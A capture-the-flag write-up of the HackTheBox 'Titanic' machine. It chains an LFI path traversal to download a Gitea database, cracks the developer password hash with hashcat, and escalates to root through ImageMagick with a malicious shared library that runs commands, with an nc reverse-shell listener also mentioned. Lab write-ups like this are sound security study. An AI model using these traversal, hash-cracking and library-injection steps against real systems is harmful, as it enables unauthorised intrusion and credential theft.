A mindmap of the whole process — MindMap

HackTheBox | Titanic Writeup

Anubhav Uniyal

Published in

InfoSec Write-ups

4 min readMar 3, 2025

Introduction
Enumeration
Initial Foothold
User Shell
Privilege Escalation
Conclusion

1. Introduction

Machine Name: Titanic
Difficulty: Easy
Overview: This walk through details the process of exploiting the Titanic machine on HackTheBox. By enumerating services on Port 80 and Port 22, we discover a Gitea instance on a subdomain. An LFI (Local File Inclusion) vulnerability exposes Gitea’s database, enabling us to retrieve credentials for a user named “developer.” After logging in via SSH, we uncover a script that uses a vulnerable version of ImageMagick, which can be exploited to gain root access.

2. Enumeration

2.1 Nmap Scan

A basic Nmap scan reveals the open ports and services:

nmap -sC -sV -oN titanic.nmap 10.10.11.55

Sample output:

Nmap 7.95 scan initiated as: nmap -sCV -oA nmap/titanic 10.10.11.55
Host: 10.10.11.55
Ports: 
22/open/tcp//ssh//OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)/,
80/open/tcp//http//Apache httpd 2.x/

Only two services appear open:

SSH (Port 22)
HTTP (Port 80)

With no other ports available, the next logical step is to investigate the website on Port 80.

3. Initial Foothold

3.1 Website on Port 80

Don’t forget to add titanic.htb to your /etc/hosts

Visiting http://titanic.htb/ displays a simple website. One interesting endpoint is /book, which returns a JSON file to download after filling out a form. Intercepting this request with Burp reveals a redirection to /download?ticket=rand-id.json.

Local File Inclusion (LFI)

Testing for LFI by replacing rand-id.json with ../../../../etc/passwd successfully returns the contents of /etc/passwd. This confirms that the site is vulnerable to LFI.

From /etc/passwd, we see a developer user, but grabbing their SSH key directly fails. We also extract /etc/hosts to check for additional domains. We find:

dev.titanic.htb

Note: You can also use the LFI to directly grab user.txt, but let’s follow the more interesting path of enumerating dev.titanic.htb.

3.2 Gitea Enumeration

Visiting http://dev.titanic.htb opens a Gitea login page. You can register a new user to explore. In Gitea, there are two repositories of interest:

docker-config
flask-app

Reviewing flask-app confirms the code flaw that led to LFI, but no additional credentials.
Reviewing docker-config reveals Gitea is running in a Docker container and stores data in /home/developer/gitea/data.

3.3 Extracting Gitea Database

By referencing Gitea’s documentation, we learn that all user data is stored in a gitea.db SQLite file, and the file is in turn stored in /data/gitea inside the docker image. The final path is:

/home/developer/gitea/data/gitea/gitea.db

Then using the LFI exploit, we can save this file locally:

curl -s "http://titanic.htb/download?ticket=/home/developer/gitea/data/gitea/gitea.db" -o gitea.db

Open gitea.db in SQLite:

sqlite3 gitea.db
sqlite> .tables
sqlite> SELECT lower_name, passwd, salt FROM user;

We retrieve a hashed password (and salt) for the developer user.

3.4 Cracking the Developer’s Password

The hash can’t be directly cracked by hashcat, convert it manually or use gitea2hashcat.py script to format it:

hashcat -m 10900 gitea_hash.txt rockyou.txt

Eventually, we crack the hash and obtain the developer’s plaintext password.

4. User Shell

Armed with the cracked password, we can SSH in:

ssh developer@titanic.htb

Once inside, we can confirm user access by reading:

cat /home/developer/user.txt

Note: This confirms we have user-level access. However, our ultimate goal is to escalate privileges to root.

5. Privilege Escalation

5.1 Identifying Potential Priv-Esc Paths

A quick sudo -l check reveals no direct sudo privileges. Exploring /opt, we find a scripts folder containing identify_images.sh. Inspecting the file, we see it calls ImageMagick’s identify command on uploaded images.

5.2 ImageMagick Exploit

The system uses ImageMagick 7.1.1–35, which is vulnerable to a known arbitrary code execution exploit. By crafting a malicious file (e.g., an .mvg or .svg), we can execute commands when identify processes it.

Crafting the Payload

Below is a simplified example using a shared library approach, though a reverse shell payload is often used in practice. Compile a malicious .so file:

gcc -x c -shared -fPIC -o ./libxcb.so.1 - << EOF
#include <stdio.h>
#include <stdlib.h>
__attribute__((constructor)) void init(){
    system("cat /root/root.txt > /tmp/root.txt");
    exit(0);
}
EOF

Once ImageMagick processes this malicious file, it executes the code within the constructor, effectively copying root.txt to /tmp/root.txt. Alternatively, you can embed a reverse shell.

5.3 Root Access

If using a reverse shell, set up a listener:

nc -lvnp 4444

Once the script processes your crafted file, you’ll catch a shell running with root privileges. Verify root access:

cat /root/root.txt

Congratulations — you’ve now fully compromised the Titanic machine!

6. Conclusion

Key Takeaways

Local File Inclusion (LFI) on the main website exposed critical files, including the Gitea SQLite database.
Gitea Database Extraction allowed us to recover and crack the developer’s credentials.
ImageMagick Exploit provided a route to root privileges through a malicious file crafted for code execution.

Flags Captured

user.txt
root.txt

Final Thoughts: The Titanic machine demonstrates how a single misconfiguration (LFI) can lead to full compromise, especially when sensitive application data (like a Gitea database) is exposed. The final pivot via ImageMagick underscores the importance of keeping software updated and restricting file processing operations.

Did you find this writeup helpful?

Share your thoughts in the comments below.
Follow for more cybersecurity and CTF content.